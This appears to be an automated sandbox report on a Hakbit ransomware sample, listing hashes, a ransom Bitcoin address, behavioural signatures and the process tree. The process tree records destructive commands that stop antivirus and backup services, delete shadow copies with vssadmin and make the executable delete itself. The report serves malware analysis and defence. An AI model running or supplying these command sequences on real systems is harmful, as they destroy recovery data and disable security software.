Analysis
-
max time kernel
45s -
max time network
41s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
09-11-2020 19:50
Static task
static1
Behavioral task
behavioral1
Sample
4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe
Resource
win10v20201028
General
-
Target
4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe
-
Size
423KB
-
MD5
055c2fba242d03ae153be4a796c55ae2
-
SHA1
be71b94e30d5465d8b72e1fc7c0137024f97baee
-
SHA256
4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024
-
SHA512
20b31f6db488d26c1f7564106e455a77461e8a9934718e72c6c917e3ec688a9a597a05f1b93584fd88d3e867f09a470eb90094e27c2525939894973d31498890
Malware Config
Extracted
C:\Users\Admin\Desktop\HELP_ME_RECOVER_MY_FILES.txt
hakbit
1Kex5QmBGtJLDagn3o2p1yoqyKn2A6EFG9
Signatures
-
Hakbit
Ransomware which encrypts files using AES, first seen in November 2019.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Disables Task Manager via registry modification
-
Deletes itself 1 IoCs
pid Process 1696 cmd.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Enumerates connected drives 3 TTPs 18 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\e: vssadmin.exe File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\D: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\g: vssadmin.exe File opened (read-only) \??\G: vssadmin.exe File opened (read-only) \??\e: vssadmin.exe File opened (read-only) \??\f: vssadmin.exe File opened (read-only) \??\g: vssadmin.exe File opened (read-only) \??\D: vssadmin.exe File opened (read-only) \??\f: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\G: vssadmin.exe File opened (read-only) \??\h: vssadmin.exe File opened (read-only) \??\h: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe -
Modifies WinLogon 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Atention..." 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "All your files were encrypted, if you want to get them all back, please carefully read the text note located in your desktop..." 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe -
Modifies service 2 TTPs 5 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 14 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1956 vssadmin.exe 836 vssadmin.exe 464 vssadmin.exe 944 vssadmin.exe 876 vssadmin.exe 1088 vssadmin.exe 1728 vssadmin.exe 1920 vssadmin.exe 1972 vssadmin.exe 2012 vssadmin.exe 1772 vssadmin.exe 1476 vssadmin.exe 1076 vssadmin.exe 608 vssadmin.exe -
Kills process with taskkill 3 IoCs
pid Process 1220 taskkill.exe 560 taskkill.exe 1300 taskkill.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 232 notepad.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 13 IoCs
pid Process 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe Token: SeDebugPrivilege 560 taskkill.exe Token: SeDebugPrivilege 1300 taskkill.exe Token: SeDebugPrivilege 1220 taskkill.exe Token: SeBackupPrivilege 1512 vssvc.exe Token: SeRestorePrivilege 1512 vssvc.exe Token: SeAuditPrivilege 1512 vssvc.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe -
Suspicious use of SendNotifyMessage 2 IoCs
pid Process 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe -
Suspicious use of WriteProcessMemory 102 IoCs
description pid Process procid_target PID 1824 wrote to memory of 1408 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 26 PID 1824 wrote to memory of 1408 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 26 PID 1824 wrote to memory of 1408 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 26 PID 1408 wrote to memory of 1956 1408 net.exe 28 PID 1408 wrote to memory of 1956 1408 net.exe 28 PID 1408 wrote to memory of 1956 1408 net.exe 28 PID 1824 wrote to memory of 1948 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 29 PID 1824 wrote to memory of 1948 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 29 PID 1824 wrote to memory of 1948 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 29 PID 1948 wrote to memory of 1772 1948 net.exe 31 PID 1948 wrote to memory of 1772 1948 net.exe 31 PID 1948 wrote to memory of 1772 1948 net.exe 31 PID 1824 wrote to memory of 1704 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 32 PID 1824 wrote to memory of 1704 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 32 PID 1824 wrote to memory of 1704 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 32 PID 1704 wrote to memory of 1768 1704 net.exe 34 PID 1704 wrote to memory of 1768 1704 net.exe 34 PID 1704 wrote to memory of 1768 1704 net.exe 34 PID 1824 wrote to memory of 1804 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 35 PID 1824 wrote to memory of 1804 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 35 PID 1824 wrote to memory of 1804 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 35 PID 1804 wrote to memory of 1660 1804 net.exe 37 PID 1804 wrote to memory of 1660 1804 net.exe 37 PID 1804 wrote to memory of 1660 1804 net.exe 37 PID 1824 wrote to memory of 1536 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 38 PID 1824 wrote to memory of 1536 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 38 PID 1824 wrote to memory of 1536 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 38 PID 1536 wrote to memory of 1692 1536 net.exe 40 PID 1536 wrote to memory of 1692 1536 net.exe 40 PID 1536 wrote to memory of 1692 1536 net.exe 40 PID 1824 wrote to memory of 1640 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 42 PID 1824 wrote to memory of 1640 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 42 PID 1824 wrote to memory of 1640 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 42 PID 1824 wrote to memory of 700 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 45 PID 1824 wrote to memory of 700 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 45 PID 1824 wrote to memory of 700 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 45 PID 1824 wrote to memory of 1256 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 48 PID 1824 wrote to memory of 1256 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 48 PID 1824 wrote to memory of 1256 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 48 PID 1824 wrote to memory of 1044 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 50 PID 1824 wrote to memory of 1044 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 50 PID 1824 wrote to memory of 1044 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 50 PID 1824 wrote to memory of 560 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 52 PID 1824 wrote to memory of 560 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 52 PID 1824 wrote to memory of 560 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 52 PID 1824 wrote to memory of 1300 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 55 PID 1824 wrote to memory of 1300 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 55 PID 1824 wrote to memory of 1300 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 55 PID 1824 wrote to memory of 1220 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 57 PID 1824 wrote to memory of 1220 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 57 PID 1824 wrote to memory of 1220 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 57 PID 1824 wrote to memory of 1956 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 59 PID 1824 wrote to memory of 1956 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 59 PID 1824 wrote to memory of 1956 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 59 PID 1824 wrote to memory of 944 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 63 PID 1824 wrote to memory of 944 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 63 PID 1824 wrote to memory of 944 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 63 PID 1824 wrote to memory of 876 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 65 PID 1824 wrote to memory of 876 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 65 PID 1824 wrote to memory of 876 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 65 PID 1824 wrote to memory of 1088 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 67 PID 1824 wrote to memory of 1088 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 67 PID 1824 wrote to memory of 1088 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 67 PID 1824 wrote to memory of 2012 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 69 PID 1824 wrote to memory of 2012 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 69 PID 1824 wrote to memory of 2012 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 69 PID 1824 wrote to memory of 1728 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 71 PID 1824 wrote to memory of 1728 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 71 PID 1824 wrote to memory of 1728 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 71 PID 1824 wrote to memory of 836 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 73 PID 1824 wrote to memory of 836 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 73 PID 1824 wrote to memory of 836 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 73 PID 1824 wrote to memory of 1772 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 75 PID 1824 wrote to memory of 1772 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 75 PID 1824 wrote to memory of 1772 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 75 PID 1824 wrote to memory of 1920 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 77 PID 1824 wrote to memory of 1920 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 77 PID 1824 wrote to memory of 1920 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 77 PID 1824 wrote to memory of 1476 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 79 PID 1824 wrote to memory of 1476 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 79 PID 1824 wrote to memory of 1476 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 79 PID 1824 wrote to memory of 1076 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 81 PID 1824 wrote to memory of 1076 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 81 PID 1824 wrote to memory of 1076 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 81 PID 1824 wrote to memory of 1972 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 83 PID 1824 wrote to memory of 1972 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 83 PID 1824 wrote to memory of 1972 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 83 PID 1824 wrote to memory of 464 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 85 PID 1824 wrote to memory of 464 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 85 PID 1824 wrote to memory of 464 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 85 PID 1824 wrote to memory of 608 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 87 PID 1824 wrote to memory of 608 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 87 PID 1824 wrote to memory of 608 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 87 PID 1824 wrote to memory of 232 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 92 PID 1824 wrote to memory of 232 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 92 PID 1824 wrote to memory of 232 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 92 PID 1824 wrote to memory of 1696 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 93 PID 1824 wrote to memory of 1696 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 93 PID 1824 wrote to memory of 1696 1824 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe 93 PID 1696 wrote to memory of 608 1696 cmd.exe 95 PID 1696 wrote to memory of 608 1696 cmd.exe 95 PID 1696 wrote to memory of 608 1696 cmd.exe 95
Processes
-
C:\Users\Admin\AppData\Local\Temp\4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe"C:\Users\Admin\AppData\Local\Temp\4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe"1⤵
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1824 -
C:\Windows\system32\net.exe"net.exe" stop avpsus /y2⤵
- Suspicious use of WriteProcessMemory
PID:1408 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop avpsus /y3⤵PID:1956
-
-
-
C:\Windows\system32\net.exe"net.exe" stop McAfeeDLPAgentService /y2⤵
- Suspicious use of WriteProcessMemory
PID:1948 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y3⤵PID:1772
-
-
-
C:\Windows\system32\net.exe"net.exe" stop mfewc /y2⤵
- Suspicious use of WriteProcessMemory
PID:1704 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfewc /y3⤵PID:1768
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BMR Boot Service /y2⤵
- Suspicious use of WriteProcessMemory
PID:1804 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y3⤵PID:1660
-
-
-
C:\Windows\system32\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y2⤵
- Suspicious use of WriteProcessMemory
PID:1536 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y3⤵PID:1692
-
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵PID:1640
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵PID:700
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLWriter start= disabled2⤵PID:1256
-
-
C:\Windows\system32\sc.exe"sc.exe" config SstpSvc start= disabled2⤵PID:1044
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:560
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1300
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1220
-
-
C:\Windows\system32\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1956
-
-
C:\Windows\system32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:944
-
-
C:\Windows\system32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:876
-
-
C:\Windows\system32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1088
-
-
C:\Windows\system32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2012
-
-
C:\Windows\system32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1728
-
-
C:\Windows\system32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:836
-
-
C:\Windows\system32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1772
-
-
C:\Windows\system32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1920
-
-
C:\Windows\system32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1476
-
-
C:\Windows\system32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1076
-
-
C:\Windows\system32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1972
-
-
C:\Windows\system32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:464
-
-
C:\Windows\system32\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
PID:608
-
-
C:\Windows\System32\notepad.exe"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HELP_ME_RECOVER_MY_FILES.txt2⤵
- Opens file in notepad (likely ransom note)
PID:232
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.exe2⤵
- Deletes itself
PID:1696 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:608
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1512